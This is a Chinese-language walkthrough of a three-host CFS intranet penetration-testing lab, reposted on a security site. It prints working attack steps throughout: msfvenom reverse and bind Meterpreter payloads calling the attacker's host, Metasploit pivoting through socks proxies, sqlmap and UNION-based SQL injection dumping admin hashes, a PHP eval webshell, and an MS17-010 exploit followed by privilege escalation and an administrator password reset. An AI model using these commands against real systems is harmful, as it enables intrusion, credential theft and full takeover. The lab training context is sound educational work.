CFS三层内网靶机

admin 2024年11月15日13:38:59评论4 views字数 3738阅读12分27秒阅读模式

好久没发了,前面因为某些原因搁置安全了一段时间,今年重新捡起,安全是兴趣,欢迎小伙伴们加入和交流,靶机地址->公众号回复:CFS三层内网

环境配置

创建三个网卡CFS三层内网靶机

网卡1CFS三层内网靶机

网卡2CFS三层内网靶机

网卡3:CFS三层内网靶机

IP:

Kali:192.168.1.130 (环境因素 导致IP后面可能变成192.168.1.131)

t1:192.168.1.129     192.168.22.129

rootteamssix.com

t2:192.168.22.128192.168.1.128   192.168.33.128    

rootteamssix.com

t3:192.168.33.33

teamssix.com

配置完后ping测试网络通信情况

kali -> t1 能通信

t1 -> t2 能通信

t2 ->t3 能通信

宝塔配置

t1:http://192.168.1.129:8888/a768f109/

账号:eaj3yhsl

密码:41bb8fee

CFS三层内网靶机

t2:http://192.168.1.128:8888/2cc52ec0/

账号:xdynr37d=

密码:123qwe..

然后删除T2的VM1网卡

CFS三层内网靶机

T1:192.168.1.129

信息收集

sudo nmap -sV -p 1-65535 -T4 192.168.1.129

sudo nmap -sS -v -A 192.168.1.129

  • -p 扫描指定的端口

  • T 扫描速度 一般为T4

  • -v 显示冗余信息(扫描细节)

  • -sS SYN扫描,使用最频繁,安全,快

  • -A 强力扫描,耗时长

  • -script=vuln 扫描常见漏洞

  • sV 服务本扫描

CFS三层内网靶机访问80端口Web服务CFS三层内网靶机

Webshell

记得有RCE,拿出工具一把梭哈

CFS三层内网靶机

直接掏出蚁剑大宝贝连接

CFS三层内网靶机

在上传目录发现了 flag.txt第一个flag

在robots.txt 发现第二个flag

在服务器根目录发现了第三个flag

然后信息收集

CFS三层内网靶机

发现第二个内网目标

CFS三层内网靶机

发现为x86

权限获取

生成elf木马

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.130 LPORT=1111 -f elf > hippo.elf

msf监听

msfconsoleuse exploit/multi/handlerset payload linux/x86/meterpreter/reverse_tcpset LHOST 192.168.1.130set LPORT 1111run

直接把木马上传到目标

CFS三层内网靶机

给他执行权限,然后执行木马。

CFS三层内网靶机

CFS三层内网靶机拿到权限

内网渗透

msf查看已拿下目标主机的内网IP情况

run  get_local_subnets

CFS三层内网靶机

查看路由信息

run autoroute -p

CFS三层内网靶机

添加路由

run autoroute -s 192.168.22.0/24

CFS三层内网靶机

配置代理

先切换到控制台background设置socks5代理use auxiliary/server/socks_proxy

CFS三层内网靶机

设置代理端口

set srvport 2222run

CFS三层内网靶机

proxychains代理

打开配置文件

sudo vim /etc/proxychains.conf

CFS三层内网靶机

代理扫描

proxychains4 nmap -p80 -Pn 192.168.22.0/24因为代理全扫描特别慢,这里就直接扫描吧proxychains4 nmap -sV -Pn 192.168.22.128 -p 80

CFS三层内网靶机

T2:192.168.22.128

socks代理

浏览器配置kali 的socks代理

CFS三层内网靶机

在robots.txt发现了一个后台页面

CFS三层内网靶机

http://192.168.22.128/admini/http://192.168.22.128/index.php?r=admini

访问查看源代码发现有一个注入

SQL注入

CFS三层内网靶机

sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" --proxy=socks5://192.168.1.130:2222 --dbs

或者

但是这个socks5稳定性确实不是很好,手注一下,也可以换windows 的代理

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” --dbsproxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms –tablesproxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columnsproxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump
192.168.22.128/index.php?r=vul&keyword=1' union select group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bage_admin-- -

CFS三层内网靶机

cmd5解密

46f94c8de14fb36680850768ff1b7f2a -> 123qwe

webshell

经过前面的信息收集,得到的后台地址 尝试登录

192.168.22.128/index.php?r=admini/public/loginadmin 123qwe

CFS三层内网靶机

CFS三层内网靶机

发现能够修改php代码,尝试插入一句话

<?php @eval($_POST["hippo"]);?>

CFS三层内网靶机

配置蚁剑代理

CFS三层内网靶机

根据网站路由规则 连接shell

http//192.168.22.128/index.php?r=tag

CFS三层内网靶机

发现flag

CFS三层内网靶机

建立隧道

生成正向后门

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=7777 -f elf > 7777.elf

msf正向连接

代理开启proxychains4 msfconsoleuse exploit/multi/handlerset payload linux/x86/meterpreter/bind_tcpset rhost 192.168.22.128set lport 7777

CFS三层内网靶机

CFS三层内网靶机

上传木马

给执行权限

chmod +x 7777.elf./7777.elf

执行后成功上线

CFS三层内网靶机

在根目录下找到了第一个flag

CFS三层内网靶机

cat /etc/passwd

发现第二个flag

CFS三层内网靶机

cat /etc/crontab

计划任务发现第三个flag

CFS三层内网靶机

T3:192.168.33.33

信息收集

ifconfig

CFS三层内网靶机

获得网络环境

run get_local_subnets

CFS三层内网靶机

run autoroute -p

查看路由信息

run autoroute -s 192.168.33.0/24

添加路由

CFS三层内网靶机

使用msf自带的portscan扫描33网段存活的主机

backgroundsearch portscan

CFS三层内网靶机

use 5show options

CFS三层内网靶机

set rhosts 192.168.33.0/24set ports 22-30,3389set threads 30run

CFS三层内网靶机

发现 192.168.33.33 开放3389 Windows主机

socks代理

use auxiliary/server/socks_proxyset srvport 3333run

CFS三层内网靶机

vim /etc/proxychains4.conf同样如果不生效 修改vim /etc/proxychains.conf

配置代

CFS三层内网靶机

proxychains4 nmap -Pn -sT 192.168.33.33

然后他卡住了,不得不说这代理真不稳定,心态也是崩了。

这里配置完后

proxychains4 nmap -sT -Pn 192.168.33.33 

探测发现存在445

ms17-010

可以先检测

use auxiliary/scanner/smb/smb_ms17_010set rhost 192.168.33.33run

我这里直接用exp打了

use exploit/windows/smb/ms17_010_psexecset payload windows/x64/meterpreter/bind_tcpset RHOSTS 192.168.33.33set LPORT 6666run

CFS三层内网靶机

查看用户

getuid

这里还可以尝试自动提权

getsystem

CFS三层内网靶机

修改administrator密码

CFS三层内网靶机

代理启动rdesktop 准备连接

proxychains4 rdesktop 192.168.33.33

然后输入账号密码登录即可

搜索一下flag就拿到了

至此,靶机全部结束

非常感谢 TeamsSix 师傅出的靶场,私底下也请教过师傅云方面的知识,非常热情的给我解答了很多问题,再次感谢。

这个靶机熟练代理和MSF比较不错,就是这个代理非常的不稳定,下次尝试不用MSF打。

原文始发于微信公众号(浪飒sec):CFS三层内网靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月15日13:38:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CFS三层内网靶机https://cn-sec.com/archives/1629253.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息